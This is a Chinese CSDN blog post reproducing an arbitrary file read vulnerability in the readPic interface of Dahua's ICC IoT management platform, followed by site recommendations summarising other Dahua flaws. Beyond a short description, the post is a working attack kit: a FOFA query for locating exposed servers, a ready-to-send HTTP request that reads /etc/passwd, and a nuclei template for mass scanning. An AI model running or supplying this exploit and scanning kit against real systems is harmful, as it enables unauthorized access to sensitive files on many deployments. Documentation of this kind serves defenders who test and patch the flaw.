漏洞复现--大华ICC readpic任意文件读取漏洞

最新推荐文章于 2024-04-25 14:18:49 发布
最新推荐文章于 2024-04-25 14:18:49 发布
阅读量1.1k 收藏 3
点赞数
分类专栏: 漏洞复现 文章标签: 网络 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/134201046
版权

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负

一:漏洞描述

ICC,即大华浩睿智能物联综合管理平台。
对技术组件进行模块化和松耦合,将解决方案分层分级,提高面向智慧物联的数据接入与生态合作能力。
该产品readpic存在任意文件读取漏洞

二:漏洞影响版本

大华ICC智能物联综合管理平台

三:网络空间测绘查询

fofa:
body="*客户端会小于800*"
image.png

四:漏洞复现

image.png
POC:

GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

image.png

五:批量检测


id: dahua-icc-readpic-anyfileread

info:
  name: 大华ICC readpic任意文件读取漏洞
  author: fgz
  severity: high
  description: |
    2021年大华全新发布的ICC架构下的基础停车业务系统,基于硬件+平台+服务能力,依托集中化管控模式,提供中大型园区集团化管理、多社区停车场联网等项目的集成应用,打造集停车场管理、运营和生态于一体的赋能平台,实现降本、增收、提效。大华ICC智能物联综合管理平台存在任意文件读取漏洞,会造成敏感信息泄露。
  tags: 2023,dahua,fileread
  metadata:
    max-request: 2
    fofa-query: body="*客户端会小于800*"
    verified: true

http:
  - method: GET
    path:
      - "{{BaseURL}}/evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd"
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*?:[0-9]*:[0-9]*:"

image.png

芝士土包鼠
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
漏洞复现大华ICC智能物联综合管理平台任意文件读取漏洞
晚风不及你
03-10 814
大华智能物联综合管理平台 iConnection Center(以下简称:ICC平台),是一套基于智能物联的综合业务管理平台软件,具备强大的后台服务能力,配套了B/S管理员端、C/S客户端、移动APP终端、小程序等不同应用端,满足用户各种使用需求。
大华科技摄像头产品非授权访问漏洞技术分析与防护方案
02-10
大华科技摄像头产品非授权访问漏洞技术分析与防护方案
epson-l800,premium-glossy ICC文件
12-25
icc_epson-l800-epson-premium-glossy-water-based,L800系列打印机,高光纸
0day-新接口-大华智能物联综合管理平台存在evo-apigw任意用户登录漏洞
最新发布
weixin_43167326的博客
04-25 1037
浙江大华技术股份有限公司智能物联综合管理平台 用户登录接口/evo-apigw/evo-oauth/oauth/token存在漏洞,攻击者使用justForTest/任意账号token即可成功登录平台,造成信息泄露。
ICC.tar.gz_anova_icc_读取文件 ICC
09-20
读取文件夹及其文件,计算ICC和anova
icc.rar_ICC-AVR_icc
09-24
icc的使用介绍,用于avr的编程。。。。。。
大华ICC平台联接客户端
12-31
大华ICC平台联接客户端
ICC平台使用说明.pdf
04-20
大华最新ICC平台使用手册
漏洞复现|大华智慧园区综合管理平台存在未授权高危漏洞(0Day)及以往漏洞合集
weixin_44217321的博客
02-27 1033
大华智慧园区综合管理平台客户端由于前台缺少访问控制授权措施,可以从ip/WPMS进行定位,借助Payload进行漏洞触发,从而达到获取服务器数据的影响。大华园区综合管理平台/emap/webservice/gis/soap/bitmap接口处存在任意文件上传漏洞,恶意攻击者可能会上传后门文件,造成服务器失陷。大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。
大华智慧园区综合管理平台RCE漏洞
holyxp的博客
07-17 1949
大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。​ 大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。
漏洞复现】某大厂存在信息泄露与逻辑漏洞
2301_80115097的博客
10-31 934
浙江大华技术股份有限公司智能物联综合管理平台是一款基于物联网技术的综合性管理平台,旨在为企业和用户提供智能化、便捷化的物联网解决方案。该平台整合了大华技术在视频监控、数据采集、数据分析等方面的核心技术,实现了对各类物联网设备的统一管理和控制,提高了企业的运营效率和管理水平。该漏洞因为对敏感目录没有做访问限制,以及没有删除默认用户。默认用户即可登录后台(密码随意)
ICC-AVR-.rar_ICC avr
09-20
ICC AVR 中文使用说明.ImageCraft ICCAVR 的介绍,ImageCraft的ICCAVR 是一种使用符合 ANSI 标准的 C 语言来开发微控制器 MCU程序的一个工具
大华 DSS 数字监控系统attachment_clearTempFile.action存在SQL注入漏洞
weixin_43167326的博客
03-20 917
大华DSS(Digital Surveillance System)是一款功能强大的数字监控系统,广泛应用于各类安全监控场景。它采用先进的数字视频处理技术,能够实现高清、实时的视频监控,为安全管理提供了有力支持。大华DSS系统具有高度的灵活性和可扩展性,可根据实际需求配置不同的监控设备,满足不同场合的安全监控需求。同时,系统还支持远程监控和管理,用户可通过手机、电脑等终端设备随时查看监控画面,实时掌握现场情况。
漏洞复现大华智慧园区综合管理平台前台任意文件上传漏洞
做自己喜欢的事,并将其发挥到极致!
09-13 681
大华智慧园区综合管理平台是由大华技术股份有限公司(Dahua Technology)开发的一款综合管理解决方案。该平台旨在帮助园区管理者提高管理效率、提升安全水平、优化资源利用,并实现智能化的园区运营。大华智慧园区综合管理平台采用模块化设计和开放式架构,可根据不同园区的需求进行定制和扩展。同时,它还支持云端部署和移动端访问,方便管理者随时随地监控园区运营情况。大华智慧园区综合管理平台存在前台任意文件上传漏洞,攻击者可通过特定Payload获取服务器敏感信息,进而获取服务器控制权限。
漏洞复现大华DSS城市安防监控平台任意文件读取漏洞
晚风不及你
03-05 610
大华DSS数字监控系统平台存在任意文件读取漏洞,攻击者可以通过此漏洞获取服务器上的任意文件,造成敏感信息泄露。
漏洞复现大华ICC智能物联综合管理平台token弱口令漏洞
晚风不及你
03-09 746
大华智能物联综合管理平台 iConnection Center(以下简称:ICC平台),是一套基于智能物联的综合业务管理平台软件,具备强大的后台服务能力,配套了B/S管理员端、C/S客户端、移动APP终端、小程序等不同应用端,满足用户各种使用需求。
漏洞复现大华智能物联ICC综合管理平台文件读取漏洞
晚风不及你
02-23 1188
大华智能物联ICC综合管理平台是一个集成了多种智能物联应用服务能力的平台。该平台提供了一系列的基础能力,如中台基础能力、各智能物联应用服务能力以及周边生态支持。
大华智能物联综合管理平台justForTest用户登录漏洞
qq_39573664的博客
12-27 1308
浙江大华技术股份有限公司智能物联综合管理平台 用户登录接口/evo-apigw/evo-oauth/oauth/token存在漏洞,使用用户justForTest/任意密码即可成功登录平台,造成信息泄露。
大华智慧园区综合管理平台 任意文件读取漏洞复现
10-10 928
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
大华icc 信息泄露
02-02
大华icc是一家专业从事信息通信技术服务的公司,该公司拥有大量客户的个人和企业信息。最近,有报道称大华icc存在信息泄露的问题,这对客户的隐私和安全造成了严重的影响。据报道,大华icc的数据库系统遭到黑客攻击,导致大量客户的个人和商业信息被非法获取。 这种信息泄露事件对大华icc来说是一次严重的挑战。首先,客户对其信息存放的安全性有了质疑,可能导致客户流失和声誉受损。其次,公司将面临严重的法律责任和罚款,因为这违反了有关数据保护和隐私保护的法律法规。另外,这也可能会招致监管机构的调查和处罚。 对于这次信息泄露事件,大华icc必须采取积极有效的措施来应对。首先,公司需要尽快通知受影响的客户,告知他们信息泄露的情况,并采取措施保护客户的权益。其次,公司需要全面审查和加强自身的信息安全体系,包括对数据库系统和网络安全进行全面检测和加固。同时,加强员工信息安全意识培训,确保员工不会成为信息泄露的漏洞。 总之,大华icc信息泄露事件严重影响了公司的声誉和客户信任。公司必须采取积极有效的措施来挽回客户信任,加强信息安全保护,以避免类似事件再次发生。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值